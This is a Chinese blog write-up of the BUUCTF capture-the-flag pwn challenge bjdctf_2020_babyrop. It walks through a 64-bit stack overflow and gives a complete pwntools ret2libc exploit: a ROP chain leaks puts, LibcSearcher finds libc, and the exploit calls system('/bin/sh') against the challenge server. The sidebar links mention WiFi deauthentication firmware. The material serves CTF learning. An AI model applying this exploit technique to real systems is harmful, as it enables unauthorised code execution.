BUUCTF|pwn-bjdctf_2020_babyrop-wp

最新推荐文章于 2022-03-25 21:18:18 发布
最新推荐文章于 2022-03-25 21:18:18 发布
阅读量233 收藏
点赞数
分类专栏: CTF 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2645470582_/article/details/121235496
版权

1.例行检查保护机制

2. 我们用64位的IDA打开该文件

shift+f12查看关键字符串,没有找到关键字字符串 

3.我们进入main函数看看

 发现有两个函数

init():这里打印了两句话

 

 vuln():打印了一句话,然后我们看到read()函数里面读取了0x64个buf,但是buf只有0x20个字节,所以这里是漏洞

 

4.system("/bin/sh")

我们用libc计算偏移量,再计算system("/bin/sh")

base_addr     = puts_addr - libc_puts_addr

system_addr = base_addr + libc_system_addr

bin_addr        = base_addr + libc_bin_addr 

PWN|栈溢出总结笔记_l2645470582_的博客-CSDN博客 

5.EXP

#encoding = utf-8

from pwn import * 
from LibcSearcher import * 

context(os = 'linux',arch = 'amd64',log_level = 'debug')
content = 0
elf = ELF('./bjdctf_2020_babyrop')

def main():
	if content == 1:
		p = process('bjdctf_2020_babyrop') 
	else:
		p = remote('node4.buuoj.cn',29917)
	
	#elf
	main_addr = elf.sym['main']
	plt_addr  = elf.plt['puts']
	got_addr  = elf.got['puts']
	pop_rdi   = 0x0400733
	ret_addr  = 0x04004c9
	
	payload   = b'a'*(0x20+0x8) + p64(pop_rdi) + p64(got_addr) + p64(plt_addr) + p64(main_addr)
	p.recvuntil("Pull up your sword and tell me u story!\n")
	p.sendline(payload)
	puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
	print(hex(puts_addr))
	
	#libc
	lib 	        = LibcSearcher('puts',puts_addr) 
	lib_puts_addr   = lib.dump('puts')
	lib_system_addr = lib.dump('system')
	lib_bin_addr    = lib.dump('str_bin_sh')
	
	#base
	base_addr       = puts_addr - lib_puts_addr
	system_addr	= base_addr + lib_system_addr
	bin_addr	= base_addr + lib_bin_addr
	payload		= b'a'*(0x20+0x8) + p64(ret_addr) + p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
	p.recvuntil("Pull up your sword and tell me u story!\n")
	p.sendline(payload)
	
	p.interactive()
main()

 

 

 

L__y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[BUUCTF]PWN——bjdctf_2020_babystack2
mcmuyanga的博客
11-03 599
bjdctf_2020_babystack2 附件 步骤: 例行检查,64位程序,开启了nx保护 尝试运行一下程序,看看情况 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726 从main函数开始看程序 我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是 大概就是一个无符号整型,注意重点是无符
[BUUCTF]PWN——bjdctf_2020_babyrop
mcmuyanga的博客
10-07 2870
bjdctf_2020_babyrop[64位libc泄露] 题目附件 解题步骤: 例行检查,64位程序,开启了NX保护 试运行一下程序,看看大概的情况,看提示,应该是道泄露libc的题目 64位ida载入,shift+f12检索程序里的字符串,没有找到可以直接使用的system(’/bin/sh’) 从main函数开始看程序 main函数调用了一个vuln函数 buf的大小是0x20,read读入的长度是0x64,明显的溢出漏洞 根据已有的信息和得到的提示,是一道64位的libc泄露 利用思路:
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 2713
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
pwn7第七关
qq_18823653的博客
04-03 388
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
BUUCTF-Pwn-bjdctf_2020_babyrop
餐桌上的猫
03-25 362
exp from pwn import* from LibcSearcher import * p=process('/home/lhb/桌面/bjdctf_2020_babyrop') elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop') p=remote('node4.buuoj.cn',27346) main=0x4006ad pop_rdi_ret=0x400733 puts_plt=elf.plt['puts'] puts_got=elf.got['puts']
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
[BUUCTF-pwn]——bjdctf_2020_babyrop
Y_peak的博客
02-12 289
[BUUCTF-pwn]——bjdctf_2020_babyrop 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babyrop 还是先checksec 一下 在IDA中看看 利用泄露地址和LibcSearcher库,找到对应的 libc版本算对偏移就可以找到system函数和 ‘/bin/sh’ 字符串. 因为64位,所以找下pop指令 思路: 泄露任意函数地址, 找到对应libc版本, 利用偏移寻找system函数和 ‘/bin/sh’ 字符串.
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1481
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
第二届 BJDCTF 2020 Pwn Writeup (出题人版)
HiTaQini
04-01 1873
最为第一届BJDCTF的参赛选手和本届比赛的二进制出题人+运维,真心祝愿BJDCTF越办越好!(说多了怕被打)
BUUCTFpwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接nc(nc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2263
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
BUUCTF|PWN-[OGeek2019]babyrop1-WP
l2645470582_的博客
01-12 2252
1.检查保护机制 (1)该文件是32位文件 (2)开启堆栈不可执行 2.用32位IDA打开该文件
WIKI|PEN-ret2text-WP
l2645470582_的博客
01-12 2064
1.检查保护机制 (1)开启堆栈不可执行保护 (2)该文件是32位文件 2.用32位IDA打开该文件 (1)先运行试试看 (2)shift+f12查看关键字符串 我们看到有system("/bin/sh")关键字符串 (3)进入main函数看看 看到gets()函数我们就看到溢出点了。S:0x64 我们构造payload #encoding = utf-8 from pwn import* context(os = 'linux',arch = 'i...
PWN|工具下载
l2645470582_的博客
11-01 1091
1.Linux/Ubuntu下载pwntools sudo pip install -U pwntools 2.Linux/Ubuntu下载checksec git clone https://github.com/slimm609/checksec.sh 3.Linux/Ubuntu下载gdb调试工具 sudo apt-get update sudo apt-get install gdb 4.Linux/Ubuntu下载LibcSearcher ...
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 943
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值